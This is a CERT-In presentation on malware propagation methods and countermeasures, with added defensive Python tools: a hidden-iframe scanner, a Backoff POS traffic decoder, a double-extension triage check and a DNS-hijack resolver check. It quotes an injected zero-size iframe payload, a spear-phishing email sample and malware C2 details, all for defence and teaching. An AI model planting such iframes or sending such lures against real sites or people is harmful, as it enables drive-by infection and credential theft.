Malware propagation & attacks trends
Posted 18-Apr-2022
Aroma Gupta, Bhavya Jain (Bhupendra Singh Awasya, Scientist ‘C’, [GCIH, GREM])
Indian Computer Emergency Response Team (CERT-In)
Ministry of Communications and Information Technology, Department of Information Technology
Government of India
Topics of Discussion
• Introduction
  – Security Definitions
  – Malware
• Malware Propagation Methods
• Attack Methodology
  – Drive-by-download
  – Watering hole attack
  – Client side/Targeted attacks/RATs
  – DNS Changer Malware
  – Rogue software
  – Web Attack Toolkits
  – Mobile malware threats
• Actions and countermeasures
Security Related Concepts
National level
• Cyber Terrorism
• Attacks on Critical Infrastructure
• Web defacement
• Website intrusion and malware propagation
• Malicious Code
• Scanning and probing
• Denial of Service & Distributed Denial of Service
• Cyber espionage
Organisational level
• Website intrusion/defacement
• Domain stalking
• Malicious Code
• Scanning and probing
• Denial of Service & Distributed Denial of Service
• Targeted attacks
• Phishing
• Data theft
• Insider threats
• Financial frauds
Individual level
• Social Engineering
• Email hacking & misuse
• Identity theft & phishing
• Financial scams
• Abuse through emails
• Abuse through Social Networking sites
• Laptop theft
Cyber threats
Malware ("malicious software")
• Refers to the various kinds of intrusive software capable of gaining unauthorized access to a system, leading to data or system compromise.
Malware Propagation
Malware propagation refers to the method by which malware is transmitted to the information system, platform or device it seeks to infect.
Propagation Methods: [figure]
More Propagation Tactics: [figure] (Source: Microsoft)
Mobile Malware Evolution [figure]
Mobile OS market share [figure]
Mobile Malware Threats
• For financial gain/loss: unnecessary calls/SMS/MMS; sending and selling private information
• Cause phones to work slowly or crash
• Wipe out contact books or other information on the phone
• Remote control of the phone
• Install false applications
Mobile Threats [figures]: Ad Jacking; SMS Trojan; Android Malware Count; Mobile Malware Count (behaviour based / platform based)
Drive-by-download
Download of malicious content from the internet without user intervention. It includes:
• The user clicks but is unaware of the consequences, e.g. a prompt to "Install Flash Plugin".
• The user is unaware of the download altogether, e.g. installation of adware while browsing.
Drive-by-download flow (diagram, attacker / malicious website / legitimate website / legitimate user's system):
1.1 Attacker creates a malicious website
1.2 Attacker infects a legitimate website
2 User requests the legitimate website
3 Website response includes the injected malicious code
4 User's browser requests content from the malicious website
5 Malicious website delivers the malware/virus to the legitimate user's system
Drive-by-download strategy
• Example: hxxp://legitimate.site/css/indexs.php
• Reason: an iframe embedded in the legitimate site, e.g. <iframe src=www.maliciousdomain.com width=0 height=0 ></iframe>, which loads the malicious domain invisibly (zero width and height) whenever the page is viewed.
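The injected-iframe check, as an added example (not code from the deck or from CERT-In): a small Python scanner that parses a page and reports iframes that are zero-sized or hidden by CSS, noting whether their src points off-site. The HTML is constructed around the slide's own iframe snippet, and SITE_HOST is an assumed value for the site being inspected.

```python
"""Scan a page for hidden iframes of the kind that turn a legitimate site into
a drive-by-download launcher. Added example, not CERT-In's code: the HTML
below is constructed and SITE_HOST is an assumed value for the site scanned."""
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "legitimate.site"  # assumption: host of the page being inspected

# Constructed page: the site's own content, the slide's injected 0x0 iframe,
# a legitimate visible embed, and a local iframe hidden by CSS.
SAMPLE_HTML = """<html><head><title>Legit site</title></head><body>
<h1>Welcome</h1>
<iframe src=www.maliciousdomain.com width=0 height=0 ></iframe>
<iframe src="https://www.youtube.com/embed/xyz" width="560" height="315"></iframe>
<iframe src="/ads/rotator.html" style="visibility:hidden"></iframe>
</body></html>"""


class _IframeCollector(HTMLParser):
    """Collect the attribute dictionary of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): v for k, v in attrs})


def _is_zero(value):
    """True if a width/height attribute value is 0 (accepts 0, '0', '0px', '0%')."""
    if value is None:
        return False
    digits = str(value).strip().lower().rstrip("px%")
    try:
        return float(digits) == 0
    except ValueError:
        return False


def _host_of(src):
    """Host named by an iframe src. Schemeless values such as the slide's
    www.maliciousdomain.com are treated as hosts; '/path' values as local."""
    if "://" not in src and not src.startswith("/"):
        src = "//" + src
    return urlparse(src).hostname


def find_hidden_iframes(html, site_host=SITE_HOST):
    """Return one record per iframe that is hidden (zero-size or CSS-hidden),
    noting whether its src points off-site; visible embeds are not reported."""
    collector = _IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src") or ""
        hidden = []
        if _is_zero(attrs.get("width")) or _is_zero(attrs.get("height")):
            hidden.append("zero-size")
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            hidden.append("hidden-by-style")
        if not hidden:
            continue
        host = _host_of(src)
        external = bool(host) and host != site_host and not host.endswith("." + site_host)
        findings.append({"src": src, "hidden": hidden, "external": external})
    return findings


if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE_HTML):
        print(finding)
```

Run against the sample, the scanner reports the slide's zero-size external iframe and the CSS-hidden local one, and stays silent on the visible video embed; in practice the same check is run over the HTML fetched from the suspected page (a hidden iframe whose src is off-site is the strongest signal).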
Example: Quick Response Code (QR Code)
"Use your tablet or phone camera to scan this image to visit our website!"
• Visit our Website @
What if the QR code was set up by an attacker, for instance with the Social-Engineer Toolkit (SET), to point the phone at a malicious page and launch an attack?
Rogue Software
Rogue antivirus "AVG -Antivirus 2011" shortcut icon: [figure]
Social networking: spreading rogue antivirus [figure]
Cryptolocker: top ransomware of 2013
• Encrypts files on local drives, shared network drives, USB drives, external hard drives, network file shares and even some cloud storage drives
• The attacker's server generates a 2048-bit RSA key pair and sends only the public key back to the infected computer; the private key needed for decryption never leaves the server
• Demands a ransom in exchange for the decryption key
FireEye has provided a means of decrypting files encrypted by Cryptolocker:
• http://www.fireeye.com/blog/corporate/2014/08/your-locker-of-information-for-cryptolocker-decryption.html
• https://www.DecryptCryptoLocker.com
Note: keep regular backups of your files.
BackOff POS malware
• Belongs to a family of malware targeting Point of Sale (POS) systems to steal customers' payment card data, i.e. track 1 and track 2 information scraped from memory, together with keystrokes such as user names and passwords.
• Propagation mechanism: scanning for and brute-forcing systems running remote desktop applications such as Microsoft Remote Desktop, Apple Remote Desktop, Splashtop 2 etc.
• OS targeted: Microsoft Windows
• Communicates with and executes commands received from the command and control (C2) server, such as Update, Terminate, Uninstall, Download and Run, Upload KeyLogs etc.
• Sends exfiltrated data to the C2 server.
• Injects a malicious stub into the Windows "explorer.exe" process for persistence, so the malware is relaunched if the malicious file crashes or is stopped forcefully.
• C2 communication (key logging routine):
  – Stolen data is encrypted using the RC4 algorithm and then encoded using Base64.
  – The password for the RC4 algorithm is the MD5 of the string formed by concatenating the 'id' parameter, the static string 'jhgtsd7fjmytkr', and the 'ui' parameter; the id and ui parameters travel in the same request as the encrypted data.
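A decoder for the C2 format just described, as an added example written here rather than taken from the deck or from the malware: it implements RC4, derives the key as MD5 over id, the static string and ui, and unwraps the Base64 data field of a captured POST body. The POST layout is a constructed reduction to the three fields the slide names (a real Backoff request carries more fields), and whether the MD5 is used as a hex string or as raw bytes is an assumption flagged in the code; the RC4 routine is checked against a standard test vector so the analyst knows the cipher, not the key guess, is right.

```python
"""Recover plaintext from the exfiltration format described for Backoff:
RC4 keyed with MD5(id + 'jhgtsd7fjmytkr' + ui), then Base64. Added example,
not the malware's or CERT-In's code; the POST body is constructed and reduced
to the three fields the slide names, and the key-encoding choice is assumed."""
import base64
import hashlib
from urllib.parse import parse_qs, urlencode

STATIC_STRING = b"jhgtsd7fjmytkr"  # static string named in the slide


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encrypting and decrypting are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def derive_key(bot_id: str, ui: str) -> bytes:
    """MD5 over id || static string || ui, in that order.
    ASSUMPTION: the 32-character hex digest is used as the RC4 key; if a real
    capture does not decode, try the raw 16-byte .digest() instead."""
    return hashlib.md5(bot_id.encode() + STATIC_STRING + ui.encode()).hexdigest().encode()


def decode_payload(bot_id: str, ui: str, data_b64: str) -> bytes:
    """Base64-decode the data field, then RC4-decrypt it with the derived key."""
    return rc4(derive_key(bot_id, ui), base64.b64decode(data_b64))


def decode_post_body(body: str) -> bytes:
    """Take a captured application/x-www-form-urlencoded body and recover the
    stolen data, using the id and ui fields carried in the same request."""
    fields = parse_qs(body, strict_parsing=True)
    return decode_payload(fields["id"][0], fields["ui"][0], fields["data"][0])


def build_sample_post(bot_id: str, ui: str, plaintext: bytes) -> str:
    """Inverse of decode_post_body; used here only to construct test traffic."""
    data = base64.b64encode(rc4(derive_key(bot_id, ui), plaintext)).decode()
    return urlencode({"id": bot_id, "ui": ui, "data": data})


# Constructed sample: a bot id, a 'user@host' style ui value and a fake keylog
# line (4111111111111111 is a well-known test card number, not a real card).
SAMPLE_ID = "7f3a9c1e"
SAMPLE_UI = "cashier@POS-01"
SAMPLE_KEYLOG = b"[notepad.exe] user=cashier1 pass=Winter2014 ;4111111111111111=2512101?"
SAMPLE_POST_BODY = build_sample_post(SAMPLE_ID, SAMPLE_UI, SAMPLE_KEYLOG)

if __name__ == "__main__":
    print(SAMPLE_POST_BODY)
    print(decode_post_body(SAMPLE_POST_BODY))
```

To use it on real traffic, pass the raw POST body from the proxy or packet capture to decode_post_body; because RC4 is symmetric and the key is derived from values the bot sends in clear, no private material from the C2 is needed to read the exfiltrated data.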
Watering Hole Attack
Refers to a technique for targeting a particular organisation by compromising websites that the targets are known to visit. The attack consists of the following phases:
– Identify the target group.
– Observe the websites the group often uses.
– Infect one or more of these websites with malware.
– Eventually, some member of the targeted group gets infected.
Recent vulnerability used in watering hole attacks: Internet Explorer zero-day vulnerability CVE-2013-1347.
Working [figure]
• One of the most prevalent techniques of targeted attacks.
Once the malware/virus is planted on the user's computer, a remote attacker can:
– access the system and steal credentials
– use it as a launching pad for further attacks
– install other malware/viruses
This can lead to complete compromise of the system.
Botnet Trends - India 2013 [figure]
Targeted Attacks
Refers to an attack technique in which the attacker targets a specific individual or organisation. It includes:
• Profiling of the individual or organisation
• Gathering information via social engineering
Purpose: stealing specific information.
Techniques of Targeted attacks
• URL shortening services, used to hide the actual URL, e.g. http://tinyurl.com/ and http://bit.ly/ (the shortened URL for "www.cert-in.org.in" is "http://bit.ly/1wvvBLU")
• Malicious email attachments (PDF, DOC, XLS, SWF, PPT); most exploited: CVE-2010-3333, CVE-2012-0158, CVE-2009-4324
• Extension hiding techniques
Targeted attacks - example
From: Sr Manager [mailto:employee@abc.com]
Sent: Tuesday, 19 January, 2010 5:14 PM
To: employee@abc.com
Bcc: Target1@abc.com, target2@abc.com
Subject: Urgent document for agenda items for the coming meeting

Dear Mr. (Target)
I am attaching the agenda items for a probable meeting for discussing briefing points for the board meeting. For confidentiality reasons the attached file is password protected; the password for the attached file is "abc123". Please have a look and send your comments and input material to me ASAP.
Regards
ABC
URL Shortening & Extension Hiding Technique
Link in E-mail: [figure]
Note: the shortened URL points to an executable that pretends to be a video file (.wmv) but whose actual file extension is .scr.
Extension Hiding Technique
Upon unzipping, a .docx (Word document) file appears to be extracted, which is actually an SCR file as shown below: [figure]
Note: the dropped file pretends to be a Microsoft Office Word document, but it is actually a self-extracting archive with the extension ".scr" (screen saver file, i.e. an executable).
• Extension shown as "docx", a Word document extension
• Self-extracting archive icon; actual extension is ".scr" (screen saver file)
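Triage for the extension-hiding tricks shown above, as an added example (not from the deck or from CERT-In): it flags double extensions such as agenda.docx.scr, which Explorer displays as agenda.docx when "hide extensions for known file types" is on, and goes one step beyond the slide by comparing the file header with the type the extension claims, so a self-extracting .scr that has simply been renamed to .docx is caught as well. The file names and header bytes are constructed.

```python
"""Triage checks for extension hiding: a name that ends in .docx or .wmv on
screen but whose real extension is .scr, and a payload whose header does not
match the type its name claims. Added example, not CERT-In's code; the sample
file names and bytes are constructed."""
import os

EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".hta", ".cpl"}
DECOY_EXTS = {".docx", ".doc", ".xlsx", ".xls", ".pptx", ".ppt", ".pdf",
              ".wmv", ".mp4", ".jpg", ".png", ".txt"}

# Leading bytes that identify a file regardless of what its name claims.
MAGIC = (
    (b"MZ", "pe-executable"),                        # .exe/.scr, incl. SFX stubs
    (b"PK\x03\x04", "zip"),                          # also .docx/.xlsx/.pptx
    (b"%PDF", "pdf"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),   # legacy .doc/.xls/.ppt
)
# What the header should say for a given claimed extension.
EXPECTED = {".docx": "zip", ".xlsx": "zip", ".pptx": "zip", ".pdf": "pdf",
            ".doc": "ole2", ".xls": "ole2", ".ppt": "ole2",
            ".exe": "pe-executable", ".scr": "pe-executable"}


def sniff(data: bytes) -> str:
    """Identify the real type from the first bytes, or 'unknown'."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def name_findings(filename: str) -> list:
    """Flag 'decoy.ext.exec' names: Explorer shows them as 'decoy.ext' when
    'Hide extensions for known file types' is on, and the icon can be faked."""
    root, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lower()
    findings = []
    if ext in EXEC_EXTS:
        inner = os.path.splitext(root)[1].lower()
        if inner in DECOY_EXTS:
            findings.append("double-extension: shown as %s, really %s" % (inner, ext))
    return findings


def triage(filename: str, data: bytes) -> dict:
    """Combine the name check with a header-versus-extension check."""
    ext = os.path.splitext(filename)[1].lower()
    actual = sniff(data)
    findings = name_findings(filename)
    expected = EXPECTED.get(ext)
    if expected and actual != expected:
        findings.append("magic-mismatch: %s claims %s but header says %s"
                        % (ext, expected, actual))
    return {"name": filename, "actual": actual, "findings": findings}


# Constructed samples: the first bytes of a PE image (what an SFX .scr starts
# with) and of a genuine .docx (a zip container).
SFX_STUB = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
REAL_DOCX = b"PK\x03\x04\x14\x00\x06\x00\x08\x00\x00\x00!\x00"

if __name__ == "__main__":
    for name, blob in (("agenda.docx.scr", SFX_STUB), ("agenda.docx", SFX_STUB),
                       ("video.wmv.scr", SFX_STUB), ("agenda.docx", REAL_DOCX)):
        print(triage(name, blob))
```

On a mail gateway or in a sandbox the same two checks are applied to every attachment and to every file extracted from an archive: a decoy extension in front of an executable one, or a document extension sitting on an MZ header, is enough to quarantine the file before any user double-clicks it.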
Most targeted OS and Applications 2013 [figure] (Source: GFI)
How attackers can change the world: discussion on "DNS Changer Malware" (Operation Ghost Click)
• About 4 million computers infected.
• Routers with default usernames and passwords are exploited.
• The malware hijacks DNS on the infected system, pointing lookups at attacker-controlled resolvers so that any site the victim asks for can be redirected.
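A resolver check for this class of compromise, as an added example (not from the deck or from CERT-In): it reads the nameservers from a Unix resolv.conf or from Windows "ipconfig /all" text and classifies each as an approved resolver, a known rogue one, or an unexpected one. The allowlist and the configuration text are constructed; the rogue ranges are the ones the FBI published for DNSChanger, not values taken from this page.

```python
"""Check a host's configured resolvers for a DNS Changer style hijack: every
nameserver must be one of the organisation's own resolvers and must not fall
inside a known rogue range. Added example, not CERT-In's code; the resolver
allowlist and the configuration text are constructed. The rogue ranges are
the ones published in the FBI's DNSChanger advisory, not values from the deck."""
import ipaddress

DNSCHANGER_RANGES = [ipaddress.ip_network(n) for n in (
    "85.255.112.0/20", "67.210.0.0/20", "93.188.160.0/21",
    "77.67.83.0/24", "213.109.64.0/20", "64.28.176.0/20")]

ORG_RESOLVERS = ["10.0.0.53", "10.0.0.54"]  # assumed: the resolvers this site should use


def _as_ip(text):
    """Parse an IPv4/IPv6 literal, or return None."""
    try:
        return ipaddress.ip_address(text)
    except ValueError:
        return None


def parse_resolv_conf(text: str) -> list:
    """nameserver entries from a Unix /etc/resolv.conf, comments stripped."""
    servers = []
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            servers.append(parts[1])
    return servers


def parse_ipconfig(text: str) -> list:
    """DNS servers from Windows 'ipconfig /all' output: the value after the
    'DNS Servers' label plus the indented continuation lines that follow it."""
    servers, collecting = [], False
    for line in text.splitlines():
        if "DNS Servers" in line:
            servers.append(line.split(":", 1)[1].strip())
            collecting = True
        elif collecting and _as_ip(line.strip()):
            servers.append(line.strip())
        else:
            collecting = False
    return servers


def check_resolvers(servers, allowlist=ORG_RESOLVERS,
                    rogue_ranges=DNSCHANGER_RANGES) -> list:
    """Classify each resolver as ok, known-rogue, not-in-allowlist or unparseable."""
    allowed = {ipaddress.ip_address(a) for a in allowlist}
    report = []
    for server in servers:
        ip = _as_ip(server)
        if ip is None:
            report.append((server, "unparseable"))
        elif any(ip in net for net in rogue_ranges):
            report.append((server, "known-rogue"))
        elif ip not in allowed:
            report.append((server, "not-in-allowlist"))
        else:
            report.append((server, "ok"))
    return report


# Constructed configurations: one approved entry, one resolver inside a rogue
# range (the kind of change the malware or a hijacked router makes), one public resolver.
SAMPLE_RESOLV_CONF = """# constructed sample
nameserver 10.0.0.53
nameserver 85.255.112.36   # inside 85.255.112.0/20
nameserver 8.8.8.8
"""
SAMPLE_IPCONFIG = """   IPv4 Address. . . . . . . . . . . : 192.168.1.10(Preferred)
   DNS Servers . . . . . . . . . . . : 85.255.112.36
                                       10.0.0.54
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""

if __name__ == "__main__":
    print(check_resolvers(parse_resolv_conf(SAMPLE_RESOLV_CONF)))
    print(check_resolvers(parse_ipconfig(SAMPLE_IPCONFIG)))
```

Because the deck notes that routers with default credentials were also reconfigured, the same check should be run against the DNS servers handed out by the site's DHCP server and configured on its gateway, not only on individual hosts; a "not-in-allowlist" result on a router is as significant as a "known-rogue" one.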
Attack Toolkits
Attack toolkits are malicious toolkits containing various exploits bundled into a single package, so that a compromised or malicious web page can try several browser and plug-in exploits against each visitor.
Working of a web attack toolkit [figure]
Attack Toolkit - MPack [figure]
Securing against drive-by-download attacks
• Use web filtering software
• Enable the SmartScreen Filter (available only in Internet Explorer)
• Use web browser plug-ins, e.g. NoScript and Adblock for Firefox
• Use different and secure web browsers, e.g. Mozilla Firefox with its built-in Google Safe Browsing feature
Enable SmartScreen Filter (IE)
This feature blocks fake or malicious sites from distributing questionable content or downloading malicious software to the victim's system.
Browser Plug-ins
• NoScript (Firefox plug-in): allows JavaScript, Java and Flash to run only on trusted websites chosen by the user. Browser Settings -> Options -> Plugins -> search for "NoScript" -> Install -> restart browser.
• Adblock (Firefox plug-in): prevents malicious ads from being executed. Browser Settings -> Options -> Plugins -> search for "Adblock" -> Install -> restart browser.
Note: many more add-ons and plug-ins are available for IE, Chrome and Firefox.
Configuring Google Chrome
Go to Chrome Settings -> Show advanced settings -> Privacy -> Content Settings:
• Disable JavaScript (or allow it only for trusted sites)
• Enable phishing and malware protection
• Keep Google Chrome updated
Configure EMET (Enhanced Mitigation Experience Toolkit)
Provides end-node protection against zero-day vulnerabilities by blocking the memory-corruption techniques exploits rely on, even when the vulnerability itself is not yet patched.
Configuring Microsoft Office Word
• Disable ActiveX controls: Office Button -> Word Options -> Trust Center -> Trust Center Settings -> ActiveX Settings
• Disable macros: Office Button -> Word Options -> Trust Center -> Trust Center Settings -> Macro Settings
• Open Microsoft Office Word documents in Protected View: Office Button -> Word Options -> Trust Center -> Trust Center Settings -> Protected View
Configuring Adobe Reader
• Go to Edit -> Preferences
Actions at organisational level
• Security policies and procedures
• CSIRT/CISO/Administrator/Users
• Multi-layered defense mechanism
  – Network behavior analysis
  – Perimeter defense
  – Security Information and Event Management
  – Database Activity Monitoring
• Updated/patched applications
• Host-based Intrusion Prevention System
• Pre-defined procedures for information sharing
• Authentication & authorisation to secure information and prevent data leakage
• Authentication of emails (digital signatures)
• Auditing and pentest
• User awareness
Actions at User/Organisation level
• Perform scanning on the computer for possible infection with the removal tools mentioned below.
• Conduct routine backups of important files, keeping the backups stored offline.
• Disconnect the infected system from wireless or wired networks to prevent the malware from further encrypting files stored on network shares.
• Exercise caution while visiting links within emails received from untrusted users or unexpectedly received from trusted users.
• Do not download and open attachments in emails received from untrusted users or unexpectedly received from trusted users.
• Exercise caution while visiting links to web pages.
• Protect yourself against social engineering attacks.
• Do not visit untrusted websites.
• Enable a firewall at desktop and gateway level and disable ports that are not required.
• Avoid downloading pirated software.
• Keep up-to-date patches and fixes on the operating system and application software.
• Keep up-to-date antivirus and antispyware signatures at desktop and gateway level.
Thank you
Incident Response Helpdesk
Phone: 1800 11 4949
FAX: 1800 11 6969
e-mail: incident@cert-in.org.in
http://www.cert-in.org.in